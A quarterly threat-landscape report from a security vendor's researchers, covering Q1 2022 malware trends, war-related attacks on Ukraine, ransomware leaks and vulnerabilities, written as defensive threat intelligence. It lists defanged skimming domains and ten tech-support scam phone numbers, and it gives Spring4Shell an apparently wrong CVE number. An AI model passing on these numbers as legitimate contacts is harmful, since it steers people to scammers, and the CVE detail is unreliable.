The first quarter of 2022 is over, so we are here again to share insights into the threat landscape and what we’ve seen in the wild. Under normal circumstances, I would probably highlight mobile spyware related to the Beijing 2022 Winter Olympics, yet another critical Java vulnerability (Spring4Shell), or perhaps how long it took malware authors to get back from their Winter holidays to their regular operations. Unfortunately, however, all of this was overshadowed by Russia’s war in Ukraine.

Similar to what’s happening in Ukraine, the warfare co-occurring in cyberspace is also very intensive, with a wide range of offensive arsenal in use. To name a few, we witnessed multiple Russia-attributed APT groups attacking Ukraine (using a series of wiping malware and ransomware, a massive uptick of Gamaredon APT toolkit activity, and satellite internet connections were disrupted). In addition, hacktivism, DDoS attacks on government sites, or data leaks are ongoing daily on all sides of the conflict. Furthermore, some of the malware authors and operators were directly affected by the war, such as the alleged death of the Raccoon Stealer leading developer, which resulted in (at least temporary) discontinuation of this particular threat. Additionally, some malware gangs have chosen the sides in this conflict and have started threatening the others. One such example is the Conti gang that promised ransomware retaliation for cyberattacks against Russia. You can find more details about this story in this report.

With all that said, it is hardly surprising to say that we’ve seen a significant increase of attacks of particular malware types in countries involved in this conflict in Q1/2022; for example, +50% of RAT attacks were blocked in Ukraine, Russia, and Belarus, +30% for botnets, and +20% for info stealers. To help the victims of these attacks, we developed and released multiple free ransomware decryption tools, including one for the HermeticRansom that we discovered in Ukraine just a few hours before the invasion started.

Out of the other malware-related Q1/2022 news: the groups behind Emotet and Trickbot appeared to be working closely together, resurrecting Trickbot infected computers by moving them under Emotet control and deprecating Trickbot afterward. Furthermore, this report describes massive info-stealing campaigns in Latin America, large adware campaigns in Japan, and technical support scams spreading in the US and Canada. Finally, again, the Lapsus$ hacking group emerged with breaches in big tech companies, including Microsoft, Nvidia, and Samsung, but hopefully also disappeared after multiple arrests of its members in March.

Last but not least, we’ve published our discovery of the latest Parrot Traffic Direction System (TDS) campaign that has emerged in recent months and is reaching users from around the world. This TDS has infected various web servers hosting more than 16,500 websites.

Stay safe and enjoy reading this report.

Jakub Křoustek, Malware Research Director

Methodology

This report is structured into two main sections – Desktop-related threats, informing about our intelligence on attacks targeting Windows, Linux, and macOS, and Mobile-related threats, where we advise about Android and iOS attacks.

Furthermore, we use the term risk ratio in this report to describe the severity of particular threats, calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.

Desktop-Related Threats

Advanced Persistent Threats (APTs)

In March, we wrote about an APT campaign targeting betting companies in Taiwan, the Philippines, and Hong Kong that we called Operation Dragon Castling. The attacker, a Chinese-speaking group, leveraged two different ways to gain a foothold in the targeted devices – an infected installer sent in a phishing email and a newly identified vulnerability in the WPS Office updater (CVE-2022-24934). After successful infection, the malware used a diverse set of plugins to achieve privilege escalation, persistence, keylogging, and backdoor access.

Operation Dragon Castling: relations between the malicious files

Furthermore, on February 23rd, a day before Russia started its invasion of Ukraine, ESET tweeted that they discovered a new data wiper called HermeticWiper. The attacker’s motivation was to destroy and maximize damage to the infected system. It’s not just disrupting the MBR but also destroying a filesystem and individual files. Shortly after that, we at Avast discovered a related piece of ransomware that we called HermeticRansom. You can find more on this topic in the Ransomware section below. These attacks are believed to have been carried out by Russian APT groups.  

Continuing this subject, Gamaredon is known as the most active Russia-backed APT group targeting Ukraine. We see the standard high level of activity of this APT group in Ukraine which accelerated rapidly since the beginning of the Russian invasion at the end of February when the number of their attacks grew several times over.

Gamaredon APT activity Q4/2021 vs. Q1/2022

Gamaredon APT targeting in Q1/22

We also noticed an increase in Korplug activity which expanded its focus from the more usual south Asian countries such as Myanmar, Vietnam, or Thailand to Papua New Guinea and Africa. The most affected African countries are Ghana, Uganda and Nigeria. As Korplug is commonly attributed to Chinese APT groups, this new expansion aligns with their long-term interest in countries involved in China’s Belt and Road initiative.

New Korplug detections in Africa and Papua New Guinea

Luigino Camastra, Malware Researcher
Igor Morgenstern, Malware Researcher
Jan Holman, Malware Researcher

Adware

Desktop adware has become more aggressive in Q4/21, and a similar trend persists in Q1/22, as the graph below illustrates:

On the other hand, there are some interesting phenomena in Q1/22. Firstly, Japan’s proportion of adware activity has increased significantly in February and March; see the graph below. There is also an interesting correlation with Emotet hitting Japanese inboxes in the same period.

On the contrary, the situation in Ukraine led to a decrease in the adware activity in March; see the graph below showing the adware activity in Ukraine in Q1/22.

Finally, another interesting observation concerns adware activity in major European countries such as France, Germany, and the United Kingdom. The graph below shows increased activity in these countries in March, deviating from the trend of Q1/22.

Concerning the top strains, most of 64% of adware was from various adware families. However, the first clearly identified family is RelevantKnowledge, although so far with a low prevalence (5%) but with a +97% increase compared to Q4/21. Other identified strains in percentage units are ICLoader, Neoreklami, DownloadAssistant, and Conduit.

As mentioned above, the adware activity has a similar trend as in Q4/21. Therefore the risk ratios remained the same. The most affected regions are still Africa and Asia. About Q1/22 data, we monitored an increase of protected users in Japan (+209%) and France (+87%) compared with Q4/21. On the other hand, a decrease was observed in the Russian Federation (-51%) and Ukraine (-50%).

Adware risk ratio in Q1/22.

Martin Chlumecký, Malware Researcher

Bots

It seems that we are on a rollercoaster with Emotet and Trickbot. Last year, we went through Emotet takedown and its resurrection via Trickbot. This quarter, shutdowns of Trickbot’s infrastructure and Conti’s internal communication leaks indicate that Trickbot has finished its swan song. Its developers were supposedly moved to other Conti projects, possibly also with BazarLoader as Conti’s new product. Emotet also introduced a few changes – we’ve seen a much higher cadence of new, unique configurations. We’ve also seen a new configuration timestamp in the log “20220404”, interestingly seen on 24th March, instead of the one we’ve been accustomed to seeing (“20211114”).

There has been a new-ish trend coming with the advent of the war in Ukraine. Simple Javascript code has been used to create requests to (mostly) Russian web pages – ranging from media to businesses to banks. The code was accompanied by a text denouncing Russian aggression in Ukraine in multiple languages. The code has quickly spread around the internet into different variations, such as a variant of open-sourced game 2048. Unfortunately, we’ve started to see webpages that incorporated that code without even declaring it so it could even happen that your computer would participate in those actions while you were checking the weather on the internet. While these could remind us of Anonymous DDoS operations and LOIC (open-source stress tool Low Orbit Ion Cannon), these pages were much more accessible to the public using their browser only with (mostly) predetermined lists of targets. Nearing the end of March, we saw a significant decline in their popularity, both in terms of prevalence and the appearance of new variants.

The rest of the landscape does not bring many surprises. We’ve seen a significant risk increase in Russia (~30%) and Ukraine (~15%); those shouldn’t be much of a surprise, though, for the latter, it mostly does not project much into the number of affected clients.

In terms of numbers, the most prevalent strain was Emotet which doubled its market share since last quarter. Since the previous quarter, most of the other top strains slightly declined their prevalence. The most common strains we are seeing are:

  • Emotet
  • Amadey
  • Phorpiex
  • MyloBot
  • Nitol
  • MyKings
  • Dorkbot
  • Tofsee
  • Qakbot

Adolf Středa, Malware Researcher

Coinminers

Coincidently, as the cryptocurrency prices are somewhat stable these days, the same goes for the malicious coinmining activity in our user base.

In comparison with the previous quarter, crypto-mining threat actors increased their focus on Taiwan (+69%), Chile (+63%), Thailand (+61%), Malawi (+58%), and France (+58%). This is mainly caused by the continuous and increasing trend of using various web miners executing javascript code in the victim’s browser. On the other hand, the risk of getting infected significantly dropped in Denmark (-56%) and Finland (-50%).

The most common coinminers in Q1/22 were:

  • XMRig
  • NeoScrypt
  • CoinBitMiner
  • CoinHelper

Jan Rubín, Malware Researcher

Information Stealers

The activities of Information Stealers haven’t significantly changed in Q1/22 compared to Q4/21. FormBook, AgentTesla, and RedLine remain the most prevalent stealers; in combination, they are accountable for 50% of the hits within the category. 

Activity of Information Stealers in Q1/22.

We noticed the regional distribution has completely shifted compared to the previous quarter. In Q4/21, Singapore, Yemen, Turkey, and Serbia were the countries most affected by information stealers; in Q1/22, Russia, Brazil, and Argentina rose to the top tier after the increases in risk ratio by 27% (RU), 21% (BR), and 23% (AR) compared to the previous quarter.

Not only a popular destination for information stealers, Latin America also houses many regional-specific stealers capable of compromising victims’ banking accounts. As the underground hacking culture continues to develop in Brazil, these threat groups target their fellow citizens for financial purposes. In Brazil, Ousaban and Chaes pose the most significant threats with more than 100k and 70k hits. In Mexico in Q1/22, we observed more than 34k hits from Casbaneiro. A typical pattern shared between these groups is the multiple-stage delivery chain utilizing scripting languages to download and deploy the next stage’s payload while employing DLL sideloading techniques to execute the final stage.

Furthermore, Raccoon Stealer, an information stealer with Russian origins, significantly decreased in activity since March. Further investigation uncovered messages on Russian underground forums advising that the Raccoon group is not working anymore. A few days after the messages were posted, a Raccoon representative said one of their members died in the Ukrainian War – they have paused operations and plan to return in a few months with a new product.

Next, a macOS malware dubbed DazzleSpy was found using watering hole attacks targeting Chinese pro-democracy sympathizers; it was primarily active in Asia. This backdoor can control macOS remotely, execute arbitrary commands, and download and upload files to attackers, thus enabling keychain stealing, key-logging, and potential screen capture.

Last but not least, more malware that natively runs on M1 Apple chips (and Intel hardware) has been found. The malware family, SysJoker, targets all desktop platforms (Linux, Windows, and macOS); the backdoor is controlled remotely and allows downloading other payloads and executing remote commands.

Anh Ho, Malware Researcher
Igor Morgenstern, Malware Researcher
Vladimir Martyanov, Malware Researcher
Vladimír Žalud, Malware Analyst

Ransomware

We’ve previously reported a decline in the total number of ransomware attacks in Q4/21. In Q1/22, this trend continued with a further slight decrease. As can be seen on the following graph, there was a drop at the beginning of 2022; the number of ransomware attacks has since stabilized.

We believe there are multiple reasons for these recent declines – such as the geopolitical situation (discussed shortly) and the continuation of the trend of ransomware gangs focusing more on targeted attacks on big targets (big game hunting) rather than on regular users via the spray and pray techniques. In other words, ransomware is still a significant threat, but the attackers have slightly changed their targets and tactics. As you will see in the rest of this section, the total numbers are lower, but there was a lot ongoing regarding ransomware in Q1.

Based on our telemetry, the distribution of targeted countries is similar to Q4/21 with some Q/Q shifts, such as Mexico (+120% risk ratio), Japan (+37%), and India (+34%).

The most (un)popular ransomware strains – STOP and WannaCry – kept their position at the top. Operators of the STOP ransomware keep releasing new variants, and the same applies for the CrySiS ransomware. In both cases, the ransomware code hasn’t considerably evolved, so a new variant merely means a new extension of encrypted files, different contact e-mail and a different public RSA key.

The most prevalent ransomware strains in Q1/22:

  • WannaCry
  • STOP
  • VirLock
  • GlobeImposter
  • Makop

Out of the groups primarily focused on targeted attacks, the most active ones based on our telemetry were LockBit, Conti, and Hive. The BlackCat (aka ALPHV) ransomware was also on the rise. The LockBit group boosted their presence and also their egos, as demonstrated by their claim that they will pay any FBI agent that reveals their location a bounty of $1M. Later, they expanded that offer to any person on the planet.

You may also recall Sodinokibi (aka REvil), which is regularly mentioned in our threat reports. There is always something interesting around this ransomware strain and its operators with ties to Russia. In our Q4/21 Threat Report we informed about the arrests of some of its operators by Russian authorities. Indeed, this resulted in Sodinokibi almost vanishing from the threat landscape in Q1/2022. However, the situation got messy at the very end of Q1/2022 and early in April as new Sodinokibi indicators started appearing, including the publishing of new leaks from ransomed companies and malware samples. It is not yet clear whether this is a comeback, an imposter operation, reused Sodinokibi sources or infrastructure, or even their combination by multiple groups. Our gut feeling is that Sodinokibi will be a topic in the Q2/22 Threat Report once again.

Russian ransomware affiliates are a never-ending story. E.g. we can mention an interesting public exposure of a criminal dubbed Wazawaka with ties to Babuk, DarkSide, and other ransomware gangs in February. In a series of drunk videos and tweets he revealed much more than his missing finger.

The Russian invasion and following war on Ukraine, the most terrible event in Q1/22, had its counterpart in cyber-space. Just one day before the invasion, several cyber attacks were detected. Shortly after the discovery of HermeticWiper malware by ESET, Avast also discovered ransomware attacking Ukrainian targets. We dubbed it HermeticRansom. Shortly after, a flaw in the ransomware was found by CrowdStrike analysts. We acted swiftly and released a free decryptor to help victims in Ukraine. Furthermore, the war impacted ransomware attacks, as some of the ransomware authors and affiliates are from Ukraine and likely have been unable to carry out their operations due to the war.

And the cyber-war went on, together with the real one. A day after the start of the invasion, the Conti ransomware gang claimed its allegiance and threatened anyone who was considering organizing a cyber-attack or war activities against Russia:

As a reaction, a Ukrainian researcher started publishing internal files of the Conti gang, including Jabber conversations and the source code of the Conti ransomware itself. However, no significant amount of encryption keys were leaked. Also, the sources that were published were older versions of the Conti ransomware, which no longer correspond to the layout of the encrypted files that are created by today’s version of the ransomware. The leaked files and internal communications provide valuable insight into this large cybercrime organization, and also temporarily slowed down their operations.

Among the other consequences of the Conti leak, the published source codes were soon used by the NB65 hacking group. This gang declared a karmic war on Russia and used one of the modified sources of the Conti ransomware to attack Russian targets.

Furthermore, in February, members of historically one of the most active (and successful) ransomware groups, Maze, announced a shut-down of their operation. They published master decryption keys for their ransomware strains Maze, Egregor, and Sekhmet; four archive files were published that contained:

  • 19 private RSA-2048 keys for Egregor ransomware. Egregor uses a three-key encryption schema (Master RSA Key → Victim RSA Key → Per-file Key).
  • 30 private RSA-2048 keys (plus 9 from old version) for Maze ransomware. Maze also uses a three-key encryption scheme.
  • A single private RSA-2048 key for Sekhmet ransomware. Because this strain uses this RSA key to encrypt the per-file key, the RSA private key is likely campaign specific.
  • A source code for the M0yv x86/x64 file infector, that was used by Maze operators in the past.

Next, an unpleasant turn of events happened after we released a decryptor for the TargetCompany ransomware in February. This immediately helped multiple ransomware victims; however, two weeks later, we discovered a new variant of TargetComany that started using the ”.avast” extension for encrypted files. Shortly after, the malware authors changed the encryption algorithm, so our free decryption tool does not decrypt the most recent variant.

On the bright side, we also analyzed multiple variants of the Prometheus ransomware and released a free decryptor. This one covers all decryptable variants of the ransomware strain, even the latest ones.

Jakub Křoustek, Malware Research Director
Ladislav Zezula, Malware Researcher

Remote Access Trojans (RATs)

New year, new me RAT campaigns. As mentioned in the Q4/21 report, the RAT activity downward trend will be just temporary; the reality was a textbook example of this claim. Even malicious actors took holidays at the beginning of the new year and then returned to work.

In the graph below, we can see a Q4/21 vs. Q1/22 comparison of RAT activity:

This quarter’s countries most affected were China, Tajikistan, Kyrgyzstan, Iraq, Kazakhstan, and Russia. Kazakhstan will be mentioned later on with the emergence of a new RAT. We also detected a high Q/Q increase in the risk ratio in countries involved in the ongoing war: Ukraine (+54%), Russia (+53%), and Belarus (+46%).

In this quarter, we spotted a new campaign distributing several RATs, reaching thousands of users, mainly in Italy (1,900), Romania (1,100), and Bulgaria (950). The campaign leverages a Crypter (a crypter is a specific tool used by malware authors for obfuscation and protection of the target payload), which we call Rattler, that ensures a distribution of arbitrary malware onto the victim’s PC. Currently, the crypter primarily distributes remote access trojans, focusing on Warzone, Remcos, and NetWire. Warzone’s main targeting campaigns also seemed to change during the past three months. In January and February, we received a considerable amount of detections from Russia and Ukraine. Still, this trend reversed in March, with decreased detections in these two countries and a significant increase in Spain, indicating a new malicious campaign.

Most prevalent RATs in Q1 were:

  • njRAT
  • Warzone
  • Remcos
  • AsyncRat
  • NanoCore
  • NetWire
  • QuasarRAT
  • PoisionIvy
  • Adwind
  • Orcus

Among malicious families with the highest increase in detections were Lilith, LuminosityLink, and Gh0stCringe. One of the reasons for the Gh0stCringe increase is a malicious campaign in which this RAT spread on poorly protected MySQL and Microsoft SQL database servers. We have also witnessed a change in the first two places of the most prevalent RATs. In Q4/21, the most pervasive was Warzone which declined this quarter by 23%. The njRat family, on the other hand, increased by 32%, and what was surprising, Adwind entered into the top 10.

Except for the usual malicious campaigns, this quarter was different. There were two significant causes for this. The first was a Lapsus$ hacking and leaking spree, and the other was the war with Ukraine.

The hacking group Lapsus$ targeted many prominent technology companies like Nvidia, Samsung, and Microsoft. For example, in the NVIDIA Lapsus$ case, this hacking group stole about 1TB of NVIDIA’s data and then commenced to leak it. The leaked data contained binary signing certificates, which were later used for signing malicious binaries. Among such signed malware was, for example, the Quasar RAT.

Then there was the conflict in Ukraine, which showed the power of information technology and the importance of cyber security – because the fight happens not only on the battlefield but also in cyberspace, with DDOS attacks, data-stealing, exploitation, cyber espionage, and other techniques. But except for these countries involved in the war, everyday people looking for information are easy targets of malicious campaigns. One such campaign involved sending email messages with attached office documents that allegedly contained important information about the war. Unfortunately, these documents were just a way to infect people with Remcos RAT with the help of Microsoft Word RCE vulnerability CVE-2017-11882, thanks to which the attacker could easily infect unpatched systems.

As always, not only old known RATs showed up. This quarter brought us a few new ones as well. The first addition to our RAT list was IceBot. This RAT seems to be a creation of the APT group FIN7; it contains all usual basic capabilities as other RATs like taking screenshots, remote code execution, file transfer, and detection of installed AV.

Another one is Hodur. This RAT is a variant of PlugX (also known as Korplug), associated with Chinese APT organizations. Hodur differed, using a different encoding, configuration capabilities, and  C&C commands. This RAT allows attackers to log keystrokes, manipulate files, fingerprint the system and more.

We mentioned that Kazakhstan is connected to a new RAT on this list. That RAT is called Borat RAT. The name is taken from the popular comedy film Borat where the main character Borat Sagdijev, performed by actor Sacha Baron Cohen, was presented as a Kazakh visiting the USA. Did you know that in reality the part of the film that should represent living in Kazakhstan village wasn’t even filmed there but in the Romanian village of Glod?

This RAT is a .NET binary and uses simple source-code obfuscation. The Borat RAT was initially discovered on hacking forums and contains many capabilities. Some features include triggering BSOD, anti-sandbox, anti-VM, password stealing, web-cam spying, file manipulation and more. As well as these baked-in features, it enables extensive module functionality. These modules are DLLs that are downloaded on demand, allowing the attackers to add multiple new capabilities. The list of currently available modules contains files “Ransomware.dll” used for encrypting files, “Discord.dll” for stealing Discord tokens, and many more.

Here you can see an example of the Borat RAT admin panel. 

We also noticed that the volume of Python compiled and Go programming language ELF binaries for Linux increased this quarter. The threat actors used open source RAT projects (i.e. Bring Your Own Botnet or Ares) and legitimate services (e.g. Onion.pet, termbin.com or Discord) to compromise systems. We were also one of the first to protect users against Backdoorit and Caligula RATs; both of these malware families were written in Go and captured in the wild by our honeypots.

Samuel Sidor, Malware Researcher
Jan Rubín, Malware Researcher
David Àlvarez, Malware Researcher

Rootkits

In Q1/22,  rootkit activity was reduced compared to the previous quarter, returning to the long-term value, as illustrated in the chart below.

The close-up view of Q1/22 demonstrates that January and February have been more active than the March period.

We have monitored various rootkit strains in Q1/22. However, we have identified that approx. 37% of rootkit activity is r77-Rootkit (R77RK) developed by bytecode77 as an open-source project under the BSD license. The rootkit operates in Ring 3 compared to the usual rootkits that work in Ring 0. R77RK is a configurable tool hiding files, directories, scheduled tasks, processes, services, connections, etc. The tool is compatible with Windows 7 and Windows 10. The consequence is that R77RK was captured with several different types of malware as a supporting library for malware that needs to hide malicious activity.

The graph below shows that China is still the most at-risk country in terms of protected users. Moreover, the risk in China has increased by about +58%, although total rootkit activity has been orders of magnitude lower compared to Q4/21. This phenomenon is caused by the absence of the Cerbu rootkit that was spread worldwide, so the main rootkit activity has moved back to China. Namely, the decrease in the rootkit activity has been observed in the countries as follows: Vietnam, Thailand, the Czech Republic, and Egypt.

In summary, the situation around the rootkit activity seems calmer compared to Q4/21, and China is still the most affected country in Q1/22. Noteworthy, the war in Ukraine has not increased the rootkit activity. Numerous malware authors have started using open-source solutions of rootkits, although these are very well detectable.

Martin Chlumecký, Malware Researcher

Technical support scams

After quite an active Q4/21 that overlapped with the beginning of Q1/22, technical support scams started to decline in inactivity. There were some small peaks of activity, but the significant wave of one particular campaign came at the end of Q1/22.

According to our data, the most targeted countries were the United States and Canada. However, we’ve seen instances of this campaign active even in other areas, like Europe, for example, France and Germany.

The distinctive sign of this campaign was the lack of a domain name and a specific path; this is illustrated in the following image.

During the beginning of March, we collected thousands of new unique domain-less URLs that have one significant and distinctive sign, their url path. After being redirected, an affected user loads a web page with a well-known recycled appearance, used in many previous technical support campaigns. In addition, several pop-up windows, the logo of well-known companies, antivirus-like messaging, cursor manipulation techniques, and even sounds are all there for one simple reason: a phone call to the phone number shown.

More than twenty different phone numbers have been used. Examples of such numbers can be seen in the following table:

1-888-828-5604
1-888-200-5532
1-877-203-5120
1-888-770-6555
1-855-433-4454
1-833-576-2199
1-877-203-9046
1-888-201-5037
1-866-400-0067
1-888-203-4992

Alexej Savčin, Malware Analyst

Traffic Direction System (TDS)

A new Traffic Direction System (TDS) we are calling Parrot TDS was very active throughout Q1/2022. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites, personal websites, university sites, and local government sites.

Parrot TDS acts as a gateway for other malicious campaigns to reach potential victims. In this particular case, the infected sites’ appearances are altered by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notices for users to update their browser, offering an update file for download. The file observed being delivered to victims is a remote access tool.

From March 1, 2022, to March 29, 2022, we protected more than 600,000 unique users from around the globe from visiting these infected sites. We protected the most in Brazil – over  73,000 individual users, in India – nearly 55,000 unique users, and more than 31,000 unique users from the US.

Map illustrating the countries Parrot TDS has targeted (in March)

Jan Rubín, Malware Researcher
Pavel Novák, Threat Operations Analyst

Vulnerabilities and Exploits

Spring in Europe has had quite a few surprises for us, one of them being a vulnerability in a Java framework called, ironically, Spring. The vulnerability is called Spring4Shell (CVE-2022-22963), mimicking the name of last year’s Log4Shell vulnerability. Similarly to Log4Shell, Spring4Shell leads to remote code execution (RCE). Under specific conditions, it is possible to bind HTTP request parameters to Java objects. While there is a logic protecting classLoader from being used, it was not foolproof, which led to this vulnerability. Fortunately, the vulnerability requires a non-default configuration, and a patch is already available.

The Linux kernel had its share of vulnerabilities; a vulnerability was found in pipes, which usually provide unidirectional interprocess communication, that can be exploited for local privilege escalation. The vulnerability was dubbed Dirty Pipe (CVE-2022-0847). It relies on the usage of partially uninitialized memory of the pipe buffer during its construction, leading to an incorrect value of flags, potentially providing write-access to pages in the cache that were originally marked with a read-only attribute. The vulnerability is already patched in the latest kernel versions and has already been fixed in most mainstream Linux distributions.

First described by Trend Micro researchers in 2019, the SLUB malware is a highly targeted and sophisticated backdoor/RAT spread via browser exploits. Now, three years later, we detected its new exploitation attack, which took place in Japan and targeted an outdated Internet Explorer.

The initial exploit injects into winlogon.exe, which will, in turn, download and execute the final stage payload. The final stage did not change much since the initial report, and it still uses Slack as a C&C server but now uses file[.]io for data exfiltration.

This is an excellent example that old threats never really go away; they often continue to evolve and pose a threat.

Adolf Středa, Malware Researcher
Jan Vojtěšek, Malware Reseracher

Mikrotik CVEs keep giving

It’s been almost four years since the very severe vulnerability CVE-2018-14847 targeting MikroTik devices first appeared. What seemed to be yet another directory traversal bug quickly escalated into user database and password leaks, resulting in a potentially disastrous vulnerability ready to be misused by cybercriminals. Unfortunately, the simplicity of exploiting and wide adoption of these devices and powerful features provided a solid foundation for various malicious campaigns being executed using these devices. It first started with injecting crypto mining javascript into pages script by capturing the traffic, poisoning the DNS cache, and incorporating these devices into botnets for DDoS and proxy purposes.  

Unfortunately, these campaigns come in waves, and we still observe MikroTik devices being misused repeatedly. In Q1/22, we’ve seen a lot of exciting twists and turns, the most prominent of which was probably the Conti group leaks which also shed light on the TrickBot botnet. For quite some time, we knew that TrickBot abused MikroTik devices as proxy servers to hide the next tier of their C&C. The leaking of Conti and Trickbot infrastructure meant the end of this botnet. However, it also provided us clues and information about one of the vastest botnets as a service operation connecting Glupteba, Meris, crypto mining campaigns, and, perhaps also, TrickBot. We are talking about 230K devices controlled by one threat actor and rented out as a service. You can find more in our research Mēris and TrickBot standing on the shoulders of giants

A few days before we published our research in March, a new story emerged describing the DDoS campaign most likely tied to the Sodinokibi ransomware group. Unsurprisingly most of the attacking devices were MikroTik again. A few days ago, we were contacted by security researchers from SecurityScoreCard. They have observed another DDoS botnet called Zhadnost targeting Ukrainian institutions and again using MikroTik devices as an amplification vector. This time, they were mainly misusing DNS amplification vulnerabilities. 

We also saw one compelling instance of a network security incident potentially involving MikroTik routers. In the infamous cyberattack on February 24th against the Viasat KA-SAT service, attackers penetrated the management segment of the network and wiped firmware from client terminal devices.

The incident surfaced more prominently after the cyberattack paralyzed 11 gigawatts of German wind turbine production as a probable spill-over from the KA-SAT issue. The connectivity for turbines is provided by EuroSkyPark, one of the satellite internet providers using the KA-SAT network.

When we analyzed ASN AS208484, an autonomous system assigned to EuroSkyPark, we found 15 MikroTik devices with exposed TCP port 8728, which is used for API access to administer the devices. Also of concern, one of the devices had a port for an infamously vulnerable WinBox protocol port exposed to the Internet. As of now, all mentioned ports are closed and no longer accessible.

We also found SSH access remapped to non-standard ports such as 9992 or 9993. This is not typically common practice and may also indicate compromise. Attackers have been known to remap the ports of standard services (such as SSH) to make it harder to detect or even for the device owner to manage. However, this could also be configured deliberately for the same reason: to hide SSH access from plain sight.

CVE-2018-14847 vulnerable devices in percent by country

From all the above, it’s apparent that we can expect to see similar patterns and DDoS attacks carried not only by MikroTik devices but also by other vulnerable IoT devices in the foreseeable future. On a positive note, the number of MikroTik devices vulnerable to the most commonly misused CVEs is slowly decreasing as new versions of RouterOS (OS that powers the MikroTik appliances) are rolled out. Unfortunately, however, there are many devices already compromised, and without administrative intervention, they will continue to be used for malicious operations repeatedly. 

We strongly recommend that MikroTik administrators ensure they have updated and patched to protect themselves and others.  


If you are a researcher and you think you have seen MikroTik devices involved in some malicious activity, please consider contacting us if you need help or consultation; since 2018, we have built up a detailed understanding of these devices’ threat landscape.

Router OS major version 7 and above adoption

Martin Hron, Malware Researcher

Web skimming

In Q1/22, the most prevalent web skimming malicious domain was naturalfreshmall[.]com, with more than 500 e-commerce sites infected. The domain itself is no longer active, but many websites are still trying to retrieve malicious content from it. Unfortunately, it means that administrators of these sites still have not removed malicious code and these sites are likely still vulnerable. Avast protected 44k users from this attack in the first quarter.

The heatmap below shows the most affected countries in Q1/22 – Saudi Arabia, Australia, Greece, and Brazil. Compared to Q4/21, Saudi Arabia, Australia and Greece stayed at the top, but in Brazil, we protected almost two times more users than in the previous quarter. However, multiple websites were infected in Brazil, some with the aforementioned domain naturalfreshmall[.]com. In addition, we tweeted about philco.com[.]br, which was infected with yoursafepayments[.]com/fonts.css. And last but not least, pernambucanas.com[.]br was also infected with malicious javascript hidden in the file require.js on their website.

Overall the number of protected users remains almost the same as in Q4/21.

Pavlína Kopecká, Malware Analyst

Mobile-Related Threats

Adware/HiddenAds

Adware maintains its dominance over the Android threat landscape, continuing the trend from previous years. Generally, the purpose of Adware is to display out-of-context advertisements to the device user, often in ways that severely impact the user experience. In Q1/22, HiddenAds, FakeAdblockers, and others have spread to many Android devices; these applications often display device-wide advertisements that overlay the user’s intended activity or limit the app’s functionality by displaying timed ads without the ability to skip them.

Adware comes in various configurations; one popular category is stealthy installation. Such apps share common features that make them difficult for the user to identify. Hiding their application's icon from the home screen is a common technique, and using blank application icons to mask their presence. The user may struggle to identify the source of the intrusive advertisements, especially if the applications have an in-built delay timer after which they display the ads. Another Adware tactic is to use in-app advertisements that are overly aggressive, sometimes to the extent that they make the original app’s intended functionality barely usable. This is common, especially in games, where timed ads are often shown after each completed level; frequently, the ad screen time greatly exceeds the time spent playing the game.

The Google Play Store has previously been used to distribute malware, but recently, actors behind these applications have changed tactics to use browser pop-up windows and notifications to spread the Adware. These are intended to trick users into downloading and installing the application, often disguised as games, ad blockers, or various utility tools. Therefore, we strongly recommend that users avoid installing applications from unknown sources and be on the lookout for malicious browser notifications.

According to our data, India, the Middle East, and South America are the most affected regions. But Adware is not strictly limited to these regions; it’s prevalent worldwide.

As can be seen from the graph below, Adware’s presence in the mobile sphere has remained dominant but relatively unchanged. Of course, there’s slight fluctuation during each quarter, but there have been no stand-out new strains of Adware as of late.

Bankers

In Q1/2022, some interesting shifts were observed in the banking malware category. With Cerberus/Alien and its clones still leading the scoreboard by far, the battle for second place has seen a jump, where Hydra replaced the previously significant threats posed by FluBot. Additionally, FluBot has been on the decline throughout Q1..

Different banker strains have been reported to use the same distribution channels and branding, which we can also confirm observing. Many banking threats now reuse the proven techniques of masquerading as delivery services, parcel tracking apps, or voicemail apps.

After the departure of FluBot from the scene, we observed an overall slight drop in the number of affected users, but this seems only to be returning to the numbers we’ve observed in the last year, just before FluBot took the stage.

Most targeted countries remain to be Turkey, Spain and Australia.

PremiumSMS/Subscription scams

While PremiumSMS/Subscription related threats may not be as prevalent as in the previous years, they are certainly not gone for good. As reported in the Q4/21 report, a new wave of premium subscription-related scams keeps popping up. Campaigns such as GriftHorse or UltimaSMS made their rounds last year, followed by yet another similar campaign dubbed DarkHerring

The main distribution channel for these seems to be Google Play, but they have also been observed being downloaded from alternative channels. Similar to before, this scam preys on the mobile operator’s subscription scheme, where an unsuspecting user is lured into giving out their phone number. The number is later used to register the victim to a premium subscription service. This can go undetected for a long time, causing the victim significant monetary loss due to the stealthiness of the subscription and hassle related to canceling such a subscription.

While the primary target of these campaigns seems to remain the same as in Q4/21 – targeting the Middle East, countries like Iraq, Jordan, but also Saudi Arabia, and Egypt – the scope has broadened and now includes various Asian countries as well – China, Malaysia and Vietnam amongst the riskiest ones.

As can be seen from the quarterly comparisons in the graph below, the spikes of activity of the respective campaigns are clear, with UltimaSMS and Grifthorse causing the spike in Q4/21. Darkherring is behind the Q1/22 spike.

Ransomware/Lockers

Ransomware apps and Lockers that target the Android ecosystem often attempt to ‘lock’ the user’s phone by disabling the navigation buttons and taking over the Android lock screen to prevent the user from interacting with the device and removing the malware. This is commonly accompanied by a ransom message requesting payment to the malware owner in exchange for unlocking the device.

Among the most prevalent Android Lockers seen in Q1/22 were Jisut, Pornlocker, and Congur. These are notorious for being difficult to remove and, in some cases, may require a factory reset of the phone. Some versions of lockers may even attempt to encrypt the user’s files; however, this is not frequently seen due to the complexity of encrypting files on Android devices.

The threat actors responsible for this malware generally rely on spreading through the use of third party app stores, game cheats, and adult content applications.

A common infection technique is to lure users through popular internet themes and topics – we strongly recommend that users avoid attempting to download game hacks and mods and ensure that they use reputable websites and official app stores.

In Q1/22, we’ve seen spikes in this category, mainly related to the Pornlocker family – apps masquerading as adult content providers – and were predominantly targeting users in Russia.

In the graph above, we can see the spike caused by the Pornlocker family in Q1/22.

Ondřej David, Malware Analysis Team Lead
Jakub Vávra, Malware Analyst

Acknowledgements / Credits

Malware researchers
  • Adolf Středa
  • Alexej Savčin
  • Anh Ho
  • David Álvarez
  • Igor Morgenstern
  • Jakub Křoustek
  • Jakub Vávra
  • Jan Holman
  • Jan Rubín
  • Ladislav Zezula
  • Luigino Camastra
  • Martin Chlumecký
  • Martin Hron
  • Ondřej David
  • Pavel Novák
